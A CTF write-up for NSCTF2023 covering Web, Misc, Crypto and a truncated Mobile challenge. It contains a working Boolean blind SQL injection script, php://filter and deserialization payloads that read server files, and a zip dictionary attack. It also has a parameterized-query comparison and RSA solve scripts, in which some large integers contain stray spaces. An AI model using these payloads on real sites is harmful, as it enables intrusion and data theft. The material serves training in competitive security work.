The 6th Ningbo City Competition [NSCTF2023]: part of Web + part of Misc + part of Crypto + Mobile

Foreword

Only the Web and Misc parts were written by me; the rest was written by the team's master. I am Feiwu, that's it.

Web

Query

Viewing the page source gives the hint login.php, which serves the login interface.


Logging in with a universal password produces a visible echo.

The echo is "login successful", which serves as the oracle for a Boolean-based blind injection script:

import requests

url = "http://d574c221d2a0f4da.node.nsctf.cn/login.php"
flag = ''
for i in range(1, 999):
    print(i)
    for j in range(32, 128):

        # database name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"

        # table name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # column names
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        # flag data: the condition holds only when character i of the flag has code j
        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"

        data = {
            'username': s,
            'password': 1
        }

        r = requests.post(url, data=data)
        if "login successful" in r.text:   # the login echo is the Boolean oracle
            flag += chr(j)
            print(flag)
            break

Run the script to get the flag
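The script above works only because user input reaches the query text unchanged. As an added illustration (not the challenge's login.php, whose source is not shown), the same login check is written with string splicing and with a bound parameter against an in-memory SQLite table; SQLite ends comments with "--" rather than MySQL's "#", so the universal-password input is adjusted accordingly.

```python
import sqlite3

# Constructed, self-contained stand-in for a login check, built two ways so the
# effect of splicing user input into SQL versus binding it can be observed offline.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")   # constructed row
    return db


def login_vulnerable(db, username, password):
    # input is spliced into the statement, so quotes and comments rewrite its logic
    sql = (f"SELECT 1 FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # input travels as a bound value and can never alter the WHERE clause, so the
    # "login successful" echo stops being a Boolean oracle for anything but real creds
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


UNIVERSAL = "' OR 1=1 -- "   # constructed universal-password input (SQLite comment syntax)


def compare(username, password):
    """Return (vulnerable_result, parameterized_result) for one input pair."""
    db = make_db()
    return (login_vulnerable(db, username, password),
            login_parameterized(db, username, password))


if __name__ == "__main__":
    print(compare("admin", "S3cret!"))   # (True, True): real credentials work in both
    print(compare(UNIVERSAL, "x"))       # (True, False): bypass only works when spliced
```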


Deserialization

Pressing F12 (viewing the page source) gives the hint:

<?php
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;          // __clone() runs here, with the deserialized position
    $input2->position = "route.php";
}
else{
    die("NONONO!");
}

Construct a payload that reads the source of route.php through the php://filter wrapper:

read=php://filter/read=convert.base64-encode/resource=route.php&input=1

Base64-decoding the output gives the code:

<h1>Here can you find the position of the flag!</h1>

<?php

$position = "f14g.php";
$gadget = "h1nt.php";

?>

View h1nt.php in the same way:

read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1

Decoded:

<?php
class test
{
    public $position;
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>

Now build the object to be deserialized so that position holds a php://filter payload reading f14g.php:

<?php
class test
{
    public $position;
    public function __construct($position){
        $this->position = $position;
    }

    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}

$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print(serialize($input).PHP_EOL);

Parameters passed in:

read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}

Base64-decode the output to get the flag.

CodeCheck

F12 gives the hint:

$flag = "************";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}

This means the file passed in as a must have the content "flag".

The file content of b must equal the parameter passed in as c.

Then d is passed in, and the include() call is used to read the file.

GET parameters:

http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter/read=convert.base64-encode/resource=index.php

Base64-decode the output to get the flag.


Crypto

secret

e and phi are not coprime, so the standard script for that case is applied directly:

import gmpy2
from Crypto.Util.number import long_to_bytes

p = 134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q = 147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n = 198501633144015525026544777517958899623243600649245949482311680927419516752629335736910709938637632909629451903724002625265952244374639692383329275640852372717192986268779177925956037444338814099630462920952056868790150295866593848667195149481816824277445553133828388057407236640508469500019163326313976062777038884929276358678705387095969939874392252478161379751566571195093720230835077727303324827752584446114627710958963806449970113412650217191890982620727563420691892621881274280790174180481183451800742808581609344831149669683651847884200910509332734175444930012149318765886537818244754720283832564886384419274 3
c = 139133963667550106070434775525772682779282413191012153816623314980460806259028312024866460207675689218811851248949602428672541629276054162284601083990874069892580370176396191955067110900128774541313835688327506061029011107820455292679405044713228473648080947906626967854705948922447161372037818902842168740354863025060422634532555804753807429592013140037885536929779143579969821183285871191241441812907533893941492353810453896968414714839473106633299938730461231345871496613479997749581050911038063757023870841493095423515410211401110484082481214084016019791085107588915955500546997198017086462324271989022719536 73874
e = 28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)          # e and phi share this factor, so e has no inverse mod phi
t1 = e // t                    # the part of e that is invertible mod phi
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)           # equals m**t mod n
s, m = gmpy2.iroot(mt1, t)     # exact t-th root; works because m**t < n
print(long_to_bytes(s))
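The following is an added example, not the challenge script: the same gcd(e, phi) > 1 decryption carried through in pure Python on a constructed key (the Mersenne primes 2**89-1 and 2**107-1, which give gcd(28, phi) == 4, are an assumption, not the challenge values). It also shows the condition the method silently depends on: the exact t-th root only exists when the plaintext is short enough that m**t < n, so a longer message is not recovered.

```python
from math import gcd

# Added example: RSA decryption when gcd(e, phi) = t > 1, on a constructed key.
# Recovery succeeds only while m**t < n; roundtrip() returns None once the root
# is not exact, which is the failure a longer (or padded) plaintext produces.


def iroot(x, k):
    """Exact integer k-th root by bisection; returns (root, is_exact)."""
    lo, hi = 0, 1
    while hi ** k <= x:
        hi <<= 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x


def decrypt_noncoprime(c, e, p, q):
    """Same steps as the write-up's script: e = t * t1 with t = gcd(e, phi);
    inverting t1 mod phi yields m**t mod n, then take the exact t-th root.
    Returns None when the root is not exact (m**t >= n), i.e. recovery fails."""
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gcd(e, phi)
    t1 = e // t
    d = pow(t1, -1, phi)        # exists because gcd(t1, phi) == 1
    m_t = pow(c, d, n)          # == m**t (mod n)
    m, exact = iroot(m_t, t)
    return m if exact else None


# Constructed key (assumption, not the challenge key): gcd(28, phi) == 4 here,
# the same e = 28 shape as the challenge.
P, Q, E = 2 ** 89 - 1, 2 ** 107 - 1, 28


def roundtrip(msg: bytes):
    """Encrypt msg under the weak key and try to recover it; None means the root failed."""
    m = int.from_bytes(msg, "big")
    rec = decrypt_noncoprime(pow(m, E, P * Q), E, P, Q)
    return None if rec is None else rec.to_bytes((rec.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(roundtrip(b"NSCTF"))                    # 40-bit m, m**4 < n: recovered
    print(roundtrip(b"a much longer message"))    # m**4 >= n: not recovered
```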

Morse’s Notebook

secret.txt is a sentence; extracting only its punctuation marks gives:

. ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . .

This looks like Morse code (. for dot, , for dash, ! separating letters); decoding it with an online tool gives:

PASSWORDISCONGRATS. This suggests a Vigenère cipher, so the ciphertext in the attachment is decrypted with it, and the key turns out to be congrats.
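As an added example (not part of the write-up), the punctuation Morse above can be decoded offline and the recovered phrase used as the Vigenère key; the attachment's ciphertext is not reproduced here, so the block encrypts a constructed sample with the same key and decrypts it back.

```python
# Added example: decode the punctuation "Morse" from secret.txt (. = dot, , = dash,
# ! = letter boundary, spaces ignored) and apply the recovered key with Vigenère.

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
}

# the punctuation sequence from the write-up
PUNCT = ". ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . ."


def decode_punct_morse(text):
    letters = []
    for token in text.split("!"):
        code = token.replace(" ", "").replace(",", "-")   # '.' already is a dot
        if code:
            letters.append(MORSE.get(code, "?"))
    return "".join(letters)


def vigenere(text, key, decrypt=False):
    """Letters-only Vigenère; non-letters pass through without consuming key."""
    out, k = [], 0
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)].lower()) - ord("a")
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def solve(ciphertext):
    """Recover the key from the Morse phrase ('PASSWORD IS CONGRATS') and decrypt."""
    phrase = decode_punct_morse(PUNCT)          # "PASSWORDISCONGRATS"
    key = phrase[len("PASSWORDIS"):]            # "CONGRATS"
    return key, vigenere(ciphertext, key, decrypt=True)


if __name__ == "__main__":
    sample = vigenere("flag{constructed_sample}", "congrats")   # constructed ciphertext
    print(solve(sample))
```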


Ciphey then recovers the flag.

RSA

An online factoring site decomposes n-1 directly, giving g:

2 * 1346104232461691 * 13570850594633462506426369052182298554140635599543685835372377476383038708650421475723391142118956001358520246769650699398490037618758005241062608387057439283872260149565854577827352267289963736282502923131251179400580891491236925451166755184695335564693793568286112036468975877609637392241679

Use the script to decrypt:

from Crypto.Util.number import inverse, long_to_bytes

g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439

e = 65537
d = inverse(e, (a - 1) * (g - 1))      # private exponent for the modulus a * g
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)

print("Decrypted message:", decrypted_message.decode())

This gives the flag:

Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}

Misc

ZIP

The attachment is an archive that needs a password to extract, but there is a hint:

The art of 0 and 1, and it will remain shorter than 9.

So the password consists only of 0 and 1 and is at most 9 digits long.

Generate a dictionary with a dictionary generator.

Then run a dictionary attack against the archive.

Cracking the password yields the flag.

Simple Document

Opening the file in 010 Editor reveals a PDF file header.

Carve the file out manually and save it as a PDF.

The PDF appears empty, so convert it to a Word document and change the text colour and font; the flag then becomes visible.

Mobile

peacock

1. The main logic is in test, and it is found that the test library is loaded inside it.

2. Find the libtest.so file in lib and open it with IDA.

A Base64-encoded ciphertext and a table are found in the Strings window.